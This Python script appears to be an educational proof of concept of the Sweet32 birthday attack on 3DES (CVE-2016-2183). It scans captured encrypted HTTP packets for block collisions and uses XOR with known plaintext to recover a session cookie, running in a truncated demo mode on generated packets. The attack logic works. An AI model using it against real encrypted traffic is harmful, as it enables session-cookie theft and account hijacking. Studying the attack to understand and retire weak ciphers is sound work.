#!/usr/bin/env python3

import argparse
import math
from lib import packetfile
from lib.tridescbc import DEMO_BLOCK_SIZE, BLOCK_SIZE

"""
Sweet32 - Birthday attack on 3DES (64-bit block cipher).

This is a demonstration of the Sweet32 attack (CVE-2016-2183) which exploits
the small 64-bit block size of 3DES through birthday collisions.
See: https://sweet32.info/

The Beastly Attack Scenario:
When two ciphertext blocks collide (c_i = c_j), we can recover plaintext using:
    p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}

Where:
- p_i is the unknown plaintext (cookie block)
- p_j is a known plaintext block
- c_{i-1} and c_{j-1} are the previous ciphertext blocks

The attack works WITHOUT knowing the encryption key - only by observing
enough encrypted traffic to find collisions.
"""

# Known plaintext template for HTTP requests (? marks unknown bytes)
REQUEST_PLAIN_TEXT = """GET /nonexistent/?????????? HTTP/1.1
Host: localhost:5000
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: session=????????????????????????????????
"""

# Known plaintext template for HTTP responses
RESPONSE_PLAIN_TEXT = """HTTP/1.0 404 NOT FOUND
Content-Type: text/html
Content-Length: 233
Server: Werkzeug/0.12.2 Python/3.5.2
Date: ?????????????????????????????
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server.</p>
"""


class Sweet32Attack:
    """Execute Sweet32 birthday attack on 3DES encrypted packets."""

    def __init__(self, filename, block_size_bytes=None):
        # Use demo block size by default for reading truncated ciphertext
        if block_size_bytes is None:
            block_size_bytes = DEMO_BLOCK_SIZE
        self.block_size = block_size_bytes
        
        # Block indexing is ALWAYS based on 8-byte 3DES blocks
        # The truncation is just for faster collision detection
        index_block_size = BLOCK_SIZE  # Always 8 for 3DES
        
        # Split known plaintexts into 8-byte blocks (matching 3DES)
        self.known_plain_texts = {
            "request": self._split_text_into_blocks(REQUEST_PLAIN_TEXT, index_block_size),
            "response": self._split_text_into_blocks(RESPONSE_PLAIN_TEXT, index_block_size)
        }

        # Calculate block locations using 8-byte block size
        self.cookie_location = self._get_cookie_block_locations(index_block_size)
        self.index_location = self._get_request_id_block_locations(index_block_size)
        self.date_location = self._get_date_block_locations(index_block_size)

        # Load encrypted packets (with truncated cipher blocks for collision matching)
        self.round_trips = packetfile.read_packets(filename, block_size_bytes)

        # Find all encrypted cookie blocks and their previous blocks
        self.encrypted_cookie_blocks = self._find_encrypted_cookie_blocks(self.round_trips)
        
        # Initialize decrypted cookie storage
        self.decrypted_cookie_blocks = [None] * len(self.cookie_location)

    @staticmethod
    def _split_text_into_blocks(text, block_size):
        """Split text into fixed-size blocks."""
        return [text[i:i+block_size] for i in range(0, len(text), block_size)]

    @staticmethod
    def _get_cookie_block_locations(block_size):
        """Get block indices where the cookie is located in requests."""
        start_index = 376  # "Cookie: session=" ends here
        end_index = 408    # 32-char cookie ends here
        return Sweet32Attack._index_to_block_index(start_index, end_index, block_size)

    @staticmethod
    def _get_request_id_block_locations(block_size):
        """Get block indices where the request ID (variable) is located."""
        return Sweet32Attack._index_to_block_index(17, 27, block_size)

    @staticmethod
    def _get_date_block_locations(block_size):
        """Get block indices where the date (variable) is located in responses."""
        return Sweet32Attack._index_to_block_index(110, 139, block_size)

    @staticmethod
    def _index_to_block_index(start_index, end_index, block_size):
        """Convert byte indices to block indices."""
        start_block_index = start_index // block_size
        end_block_index = math.ceil(end_index / block_size)
        return range(start_block_index, end_block_index)

    def _find_encrypted_cookie_blocks(self, encrypted_round_trips):
        """
        Build a dictionary of all encrypted cookie blocks.
        Maps: truncated_ciphertext_block -> {prev_full: full previous block for XOR, index: cookie_block_index}
        
        Uses truncated blocks as keys for collision matching, but stores FULL
        previous blocks for XOR recovery (the formula needs full blocks).
        """
        encrypted = {}
        for round_trip in encrypted_round_trips:
            cipher = round_trip['request']['cipher']  # Truncated blocks
            cipher_full = round_trip['request'].get('cipher_full', cipher)  # Full 8-byte blocks
            iv = round_trip['request']['iv']
            
            for location in self.cookie_location:
                if location >= len(cipher):
                    continue
                # Use truncated block as key for collision matching
                block = cipher[location]
                # Store FULL previous block for XOR recovery
                if location > 0:
                    prev_full = cipher_full[location - 1]
                else:
                    prev_full = iv
                encrypted[block] = {
                    "prev_full": prev_full,  # Full 8-byte block for XOR
                    "index": location - self.cookie_location[0],
                }
        return encrypted

    def execute_attack(self):
        """
        Execute the Sweet32 birthday attack.
        
        Finds collisions ACROSS ALL PACKETS between:
        - Encrypted cookie blocks (unknown plaintext) from ALL requests
        - Encrypted known-plaintext blocks from ANY request
        
        Uses the formula: p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}
        
        This works across packets because when c_i = c_j, the INPUTS to
        the block cipher are equal: (p_i ⊕ c_{i-1}) = (p_j ⊕ c_{j-1})
        The IV is just c_{-1} for block 0, so the formula handles it.
        """
        print()
        print("=" * 60)
        print("           SWEET32 BIRTHDAY ATTACK (CVE-2016-2183)")
        print("=" * 60)
        print(f"[*] Loaded {len(self.round_trips)} encrypted packets")
        print(f"[*] Block size: {self.block_size} bytes ({self.block_size * 8} bits)")
        print(f"[*] Cookie location: blocks {self.cookie_location[0]}-{self.cookie_location[-1]} (bytes 376-408)")
        print(f"[*] Tracking {len(self.encrypted_cookie_blocks)} encrypted cookie blocks")
        print()
        print("[*] Scanning for birthday collisions...")
        print("-" * 60)
        
        collision_count = 0

        for round_trip in self.round_trips:
            request = round_trip['request']
            
            # Check for collisions between known-plaintext blocks and ANY cookie block
            for i in range(len(request['cipher'])):
                # Skip blocks that contain unknown data
                if i in self.cookie_location or i in self.index_location:
                    continue

                # Check if this ciphertext block matches any cookie block from ANY packet
                if request['cipher'][i] in self.encrypted_cookie_blocks:
                    collision_count += 1
                    cipher_hex = request['cipher'][i].hex()
                    known_plain = self.known_plain_texts["request"][i]
                    print(f"[!] COLLISION #{collision_count} FOUND!")
                    print(f"    Known block {i} ciphertext: {cipher_hex}")
                    print(f"    Known plaintext: {repr(known_plain)}")
                    print(f"    Matches a cookie block!")
                    self._exploit_collision(
                        request, 
                        self.known_plain_texts["request"], 
                        i
                    )
                    print()

            # Check if we've recovered the entire cookie
            if self._cookie_is_fully_decrypted():
                break

        print("-" * 60)
        print()
        
        if self._cookie_is_fully_decrypted():
            print("=" * 60)
            print("                    ATTACK SUCCESSFUL!")
            print("=" * 60)
            cookie_str = ''.join(self.decrypted_cookie_blocks)
            cookie_hex = cookie_str.encode('latin-1').hex()
            print(f"[+] Recovered FULL cookie after {collision_count} collision(s)!")
            print()
            print(f"    RECOVERED COOKIE (hex): {cookie_hex}")
            print(f"    RECOVERED COOKIE (raw): {repr(cookie_str)}")
            print("=" * 60)
        else:
            recovered = sum(1 for x in self.decrypted_cookie_blocks if x is not None)
            print("=" * 60)
            print("                  PARTIAL RECOVERY")
            print("=" * 60)
            print(f"[+] Recovered {recovered}/{len(self.decrypted_cookie_blocks)} cookie blocks")
            print()
            for i, block in enumerate(self.decrypted_cookie_blocks):
                block_num = i + 1
                if block is not None:
                    block_hex = block.encode('latin-1').hex()
                    print(f"    Block {block_num}: {block_hex}  ← RECOVERED!")
                else:
                    print(f"    Block {block_num}: ????????????????  (need more collisions)")
            print()
            print("[*] Need more encrypted traffic for complete recovery!")
            print("=" * 60)
            print()
            print("Compare with the SECRET COOKIE from generate_rigged_packets.py:")
            print("If Block 1 matches the 'First 8 bytes (hex)', the attack worked!")

        return self.decrypted_cookie_blocks

    def _cookie_is_fully_decrypted(self):
        """Check if all cookie blocks have been recovered."""
        return all(x is not None for x in self.decrypted_cookie_blocks)

    def _exploit_collision(self, ciphertext, plaintext, block_index):
        """
        Exploit a collision to recover a cookie block.
        
        When c_i = c_j (collision on truncated blocks), we use:
            p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}
        
        NOTE: We use FULL 8-byte blocks for XOR, even though collision was
        detected on truncated blocks. This is valid because:
        - Collision on truncated blocks approximates full block collision
        - XOR recovery needs full blocks to get full 8-byte plaintext
        - For demo purposes, partial collisions give partial recovery
        
        Args:
            ciphertext: The packet containing the known-plaintext collision
            plaintext: The known plaintext blocks (8-byte blocks)
            block_index: Index of the colliding block in known plaintext
        """
        cipher = ciphertext['cipher']  # Truncated blocks for collision key
        cipher_full = ciphertext.get('cipher_full', cipher)  # Full blocks for XOR
        iv = ciphertext['iv']
        cookie_block_info = self.encrypted_cookie_blocks[cipher[block_index]]

        # Skip if we've already recovered this cookie block
        if self.decrypted_cookie_blocks[cookie_block_info["index"]] is not None:
            return

        # Get the known plaintext block (p_j) - 8 bytes
        known_plain = plaintext[block_index]

        # Get FULL previous ciphertext block for known plaintext (c_{j-1})
        if block_index != 0:
            prev_known = cipher_full[block_index - 1]
        else:
            prev_known = iv

        # Get FULL previous ciphertext block for cookie (c_{i-1})
        prev_cookie = cookie_block_info["prev_full"]

        # Apply the attack formula: p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}
        cookie_plain = self._recover_plaintext(known_plain, prev_known, prev_cookie)
        
        self.decrypted_cookie_blocks[cookie_block_info["index"]] = cookie_plain

    @staticmethod
    def _recover_plaintext(known_plain, prev_known_cipher, prev_cookie_cipher):
        """
        Recover unknown plaintext using the birthday attack formula.
        
        p_i = p_j ⊕ c_{i-1} ⊕ c_{j-1}
        
        Args:
            known_plain: Known plaintext block (p_j)
            prev_known_cipher: Previous ciphertext block for known plaintext (c_{j-1})
            prev_cookie_cipher: Previous ciphertext block for cookie (c_{i-1})
            
        Returns:
            Recovered plaintext string
        """
        if isinstance(known_plain, str):
            known_plain = known_plain.encode()
        
        # Use the minimum length (ciphertext might be truncated in demo mode)
        min_len = min(len(known_plain), len(prev_known_cipher), len(prev_cookie_cipher))
        
        result = []
        for i in range(min_len):
            # XOR: p_i = p_j ⊕ c_{j-1} ⊕ c_{i-1}
            recovered_byte = known_plain[i] ^ prev_known_cipher[i] ^ prev_cookie_cipher[i]
            result.append(chr(recovered_byte))

        return ''.join(result)


def main(filename, block_size_bytes):
    attack = Sweet32Attack(filename, block_size_bytes)
    return attack.execute_attack()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='Sweet32 birthday attack on 3DES encrypted packets (CVE-2016-2183)')
    parser.add_argument('file', type=str,
                        help="File to read packets from. Use generate_packets.py to create the file")
    parser.add_argument('--block-size', type=int, default=DEMO_BLOCK_SIZE,
                        help=f"Block size in bytes. Defaults to {DEMO_BLOCK_SIZE} bytes (demo mode).")
    
    args = parser.parse_args()
    main(args.file, args.block_size)
